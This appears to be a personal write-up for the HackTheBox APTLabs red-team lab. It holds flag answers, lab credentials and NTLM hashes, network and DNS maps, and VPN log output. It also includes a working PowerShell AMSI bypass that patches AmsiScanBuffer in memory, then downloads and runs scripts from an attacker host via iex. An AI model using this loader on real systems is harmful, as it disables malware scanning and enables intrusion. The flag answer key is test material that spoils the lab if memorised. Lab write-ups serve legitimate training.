# APTLabs ProLab Writeup

## APTLabs Premise

APTLabs simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider). The lab requires prerequisite knowledge of attacking Active Directory networks. APTLabs consists of fully patched servers, prevalent enterprise technologies, a simulated WAN network, and much more! Your goal is to compromise all client networks and reach Domain Admin wherever possible. On completion of this lab you will be familiar with long-lasting TTPs, how to abuse enterprise technology, and be a true google-ninja.

This is an extremely challenging Red Team Operator Level III lab that will push you to the limit and put your skills to the test in the following areas:

- Active Directory enumeration and exploitation
- Bypassing security features such as 2FA, JEA and WDAC
- Exploiting interactive users
- Kerberos attacks
- Lateral movement between multiple forests
- Reaching your goals without using any CVEs

## Flags

- Certified secure..?: APTLABS{C3RT!FICAT3_M@NAG3R} (http://10.10.110.62:8080/admin/)
- Why is it always this?: APTLABS{R00t_Dn$_AdM!n} (https://10.10.110.13/admin/, domains tab)
- Password123: APTLABS{P@sS0rD_R3Us3} (sqlmap on 10.10.110.88)
- I do enjoy fishing: APTLABS{M@lTiF@cT0R_PhI$h!nG} (passsafe in robert's Nextcloud account)
- I've just had enough of it...: APTLABS{AiNt_J3a_Ju$T_Gr3At} (C:\Users\adfs_svc\Documents on adfs.0x0security.local)
- Who will provide my identity?: APTLABS{Y0u_B3c0M3_Th3_S@mL_pR0vId3R} (Admin Desktop on servicedesk.gigantichosting.local)
- Look busy, carry some cables, clipboard etc.: APTLABS{@lW@$_W@nT3d_T0_b3_@_$yS@dM!N} (administrator on sccm.gigantichosting.local)
- Start thinking laterally: APTLABS{LaT3r@L_M0v3M3nT_w!Th_$CcM_@g3Nt} (administrator on srv002.orbitfish.local)
- I know Kerberos: APTLABS{L3g!t_KiRb!_3DiT0R} (administrator on srv001.orbitfish.local)
- I should stay on-prem: APTLABS{AdC0nN3cT_pWn@G3} (administrator on dc.orbitfish.local)
- Welcome to cubano: APTLABS{0N3_w@Y_t0_@Bu$3_Sp00LeR_bUg} (administrator on dev.cubano.local)
- Not again: APTLABS{An0Th3R_w@Y_t0_@Bu$3_Sp00LeR_bUg} (administrator on exchange.cubano.local)
- This ain't right: APTLABS{@d!Dn$_4_Cr3D3nTi@L$} (administrator on web.cubano.local)
- Good game: APTLABS{D0m@iN_C0mPr0MiSe} (administrator on dc.cubano.local)
- Can i trust you?: APTLABS{Th3_P@M_@Dm!n} (C:\Users\s.helmer\Desktop on server04.megabank.local)
- I thought so...: APTLABS{Th3_SQL_@Dm!n} (C:\Users\Administrator\Desktop on server04.megabank.local)
- This is bad, very, very bad: APTLABS{L3Ts_Br3Ak_!T} (Get-Flag on server03.megabank.local)
- Who could have thought?: APTLABS{P@m_@Dm!nI$tR@t0R} (C:\Users\Administrator\Desktop on server05.megabank.local)
- You cant restrict me!: APTLABS{wD@C_ByP@s$!} (C:\Users\remote_admin on primary.megabank.local)
- There are two types of people...: APTLABS{R3tuRn_0F_tH3_b@CkUp_@DmIn} (C:\Users\Administrator.GIGANTICHOSTING on primary.megabank.local)

## SOP EDR Bypass

### Chained PowerShell AMSI bypass (meowme.ps1)

```powershell
# Loader used throughout the lab: patches AmsiScanBuffer in the current
# PowerShell process, then pulls meowme.ps1 and PowerUpSQL.ps1 from the
# attacker host (10.10.14.15).
$Meow = '
using System;
using System.Runtime.InteropServices;
public class Meow {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern void CopyMemory(IntPtr dest, IntPtr src, uint count);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
    public static void cp(byte[] source, IntPtr dest, int count) {
        Marshal.Copy(source, 0, dest, count);
    }
}
';
Add-Type $Meow;
$LoadLibrary = [Meow]::LoadLibrary("a" + "m" + "si.dll");
$Address = [Meow]::GetProcAddress($LoadLibrary, "Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er");
$p = 0;
[Meow]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p);
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3);
[Meow]::cp($Patch, $Address, 6);
iex ((new-object net.webclient).downloadstring("http://10.10.14.15/meowme.ps1"));
iex ((new-object net.webclient).downloadstring("http://10.10.14.15/PowerUpSQL.ps1"))
```

## creds

One-liners for use with the creds below.

```
[email protected] | +90 433 794 13 53 | $Ul3S@t0x0S3c | mak        -> works on ADFS/servicedesk and 0x0security.local
[email protected] | +90 921 525 87 74 | iL0v3l!nux | linuxrobert
sshuser:ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr                      -> landfall
robert : aep!@#vae$#12ces                                          -> nextcloud robert account
[email protected] | +90 653 111 67 35 | P@ssw0rd1! | Junglelee
[email protected] | +90 763 995 34 55 | P@ssw0rd1!
[email protected] | +90 432 652 14 13 | P@ssw0rd1!
[email protected] | APTLABS{P@sS0rD_R3Us3} | P@ssw0rd1!                -> works on django 10.10.110.62:8080/admin
[email protected]
[email protected]
0x0security.local\adfs_svc:S3cur!ty
gigantichosting.local\j.smith:Qwerty1!
gigantichosting.local\s.svensson:Qwerty123
gigantichosting.local\l.larsson:Password123
gigantichosting.local\l.rodriguez:London10
gigantichosting.local\s.helmer:Hades123
gigantichosting.local\j.johson:Airf0rce!
megabank.local\svc_ata:Password123
megabank\fs1_msa$:0725cf9212c29a0189283e0743d76093
megabank\backup$:0d46799eac240946d4c7b104b995154d
megabank\remote_admin:22be2f4edecb047c1529ad275fd82fe3
megabank\administrator:41aa70e55117291f881dfd1ac40fdbbf
orbitfish\administrator:0992565d28deb9171500709a40e92a9e
cubano\administrator:aec91a06b0490d1ed48cba994e9d472e
```

## machines

- APT-FW01
- [ ] APT-0X0SEC-NEXTCLOUD: nextcloud (linux), 192.168.20.31
- [ ] APT-0X0SEC-ADFS: adfs.0x0security.local, 192.168.20.15
- [ ] APT-0X0SEC-DC: dc.0x0security.local, 192.168.20.10
- [ ] APT-MSP-DC: dc.gigantichosting.local, 192.168.21.10
- [ ] APT-MSP-SD: servicedesk.gigantichosting.local, 192.168.21.123
- [ ] APT-MSP-SCCM: sccm.gigantichosting.local, 192.168.21.155
- [ ] APT-MEGABANK-DC: primary.megabank.local, 192.168.24.10
- [ ] APT-MEGABANK-SERVER04: server04.megabank.local, 192.168.24.112
- [ ] APT-MEGABANK-SERVER03: server03.megabank.local, 192.168.24.155
- [ ] APT-MEGABANK-SERVER05: server05.megabank.local, 192.168.24.118
- [ ] APT-ORBITFISH-DC: dc.orbitfish.local, 192.168.22.10
- [ ] APT-ORBITFISH-SRV001: srv001.orbitfish.local, 192.168.22.123
- [ ] APT-ORBITFISH-SRV002: srv002.orbitfish.local, 192.168.22.16
- [ ] APT-CUBANO-DC: dc.cubano.local, 192.168.23.10
- [ ] APT-CUBANO-DEV: dev.cubano.local, 192.168.23.164
- [ ] APT-CUBANO-EXCHANGE: exchange.cubano.local, 192.168.23.146
- [ ] APT-CUBANO-WEB: web.cubano.local, 192.168.23.200

## DNS mapping

```
#beachhead
nextcloud nix box: 192.168.20.31

#0x0security
0x0security.local.                  3600 IN A 192.168.20.10
dc.0x0security.local.               3600 IN A 192.168.20.10
adfs.0x0security.local.             3600 IN A 192.168.20.15

#gigantichosting
gigantichosting.local.              3600 IN A 192.168.21.10
dc.gigantichosting.local.           3600 IN A 192.168.21.10
servicedesk.gigantichosting.local.  1200 IN A 192.168.21.123
sccm.gigantichosting.local.         1200 IN A 192.168.21.155

#orbitfish
dc.orbitfish.local.                 3600 IN A 192.168.22.10
orbitfish.local.                     600 IN A 192.168.22.10
srv001.orbitfish.local.             1200 IN A 192.168.22.123
srv002.orbitfish.local.             1200 IN A 192.168.22.16

#cubano
cubano.local.                        600 IN A 192.168.23.10
dc.cubano.local.                     600 IN A 192.168.23.10
exchange.cubano.local.              1200 IN A 192.168.23.146
dev.cubano.local.                   1200 IN A 192.168.23.164
web.cubano.local.                   1200 IN A 192.168.23.200

#megabank
megabank.local.                      600 IN A 192.168.24.10
dc.megabank.local.                   600 IN A 192.168.24.10   ; also primary.megabank.local
server03.megabank.local.            1200 IN A 192.168.24.155
server04.megabank.local.            1200 IN A 192.168.24.112
server05.megabank.local.            1200 IN A 192.168.24.118
```

## /etc/hosts local modifications

```
# APTLABS PROLAB -------
10.10.110.74    apt-0x0sec-nextcloud landfall
10.10.110.231   nextcloud.0x0security.com storage.0x0security.com 0x0security.com
10.10.14.15     phish.00security.com
## 0x0security.local
10.10.14.15     nextcloud.00security.com
192.168.20.15   adfs.0x0security.local
192.168.20.10   dc.0x0security.local 0x0security.local
## gigantichosting.local
192.168.21.123  servicedesk.gigantichosting.local
192.168.21.10   gigantichosting.local dc.gigantichosting.local
192.168.21.155  sccm.gigantichosting.local
## megabank.local
192.168.24.112  server04.megabank.local
192.168.24.155  server03.megabank.local
192.168.24.118  server05.megabank.local
192.168.24.10   megabank.local MEGABANK primary.megabank.local
## cubano.local
192.168.23.10   dc.cubano.local cubano.local
192.168.23.164  dev.cubano.local
192.168.23.146  exchange.cubano.local
192.168.23.200  web.cubano.local
## orbitfish.local
192.168.22.10   dc.orbitfish.local orbitfish.local
192.168.22.123  srv001.orbitfish.local
192.168.22.16   srv002.orbitfish.local
# 0------------------
```

## krb5.conf modifications

Realm entries added under the `[realms]` section so that Kerberos tooling can find each forest's KDC:

```
MEGABANK.LOCAL = {
    kdc = primary.megabank.local
}
CUBANO.LOCAL = {
    kdc = dc.cubano.local
}
ORBITFISH.LOCAL = {
    kdc = dc.orbitfish.local
}
```

## vpn details

```
root@nix36:~/aptlabs# ls
.  ..  SessionGopher.ps1  binaries  eu-apt-1-hoxh4.ovpn
root@nix36:~/aptlabs# openvpn eu-apt-1-hoxh4.ovpn
2020-12-09 22:42:49 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2020-12-09 22:42:49 DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-128-CBC' to --data-ciphers or change --cipher 'AES-128-CBC' to --data-ciphers-fallback 'AES-128-CBC' to silence this warning.
2020-12-09 22:42:49 OpenVPN 2.5.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Oct 28 2020
2020-12-09 22:42:49 library versions: OpenSSL 1.1.1h  22 Sep 2020, LZO 2.10
2020-12-09 22:42:49 Outgoing Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication
2020-12-09 22:42:49 Incoming Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication
2020-12-09 22:42:49 TCP/UDP: Preserving recently used remote address: [AF_INET]23.106.32.44:1337
2020-12-09 22:42:49 Socket Buffers: R=[212992->212992] S=[212992->212992]
2020-12-09 22:42:49 UDP link local: (not bound)
2020-12-09 22:42:49 UDP link remote: [AF_INET]23.106.32.44:1337
2020-12-09 22:42:49 TLS: Initial packet from [AF_INET]23.106.32.44:1337, sid=4c914866 3b13a036
2020-12-09 22:42:49 VERIFY KU OK
2020-12-09 22:42:49 Validating certificate extended key usage
2020-12-09 22:42:49 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2020-12-09 22:42:49 VERIFY EKU OK
2020-12-09 22:42:49 VERIFY OK: depth=0, C=UK, ST=City, L=London, O=HackTheBox, CN=htb, name=htb, [email protected]
2020-12-09 22:42:49 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
2020-12-09 22:42:49 [htb] Peer Connection Initiated with [AF_INET]23.106.32.44:1337
2020-12-09 22:42:50 SENT CONTROL [
```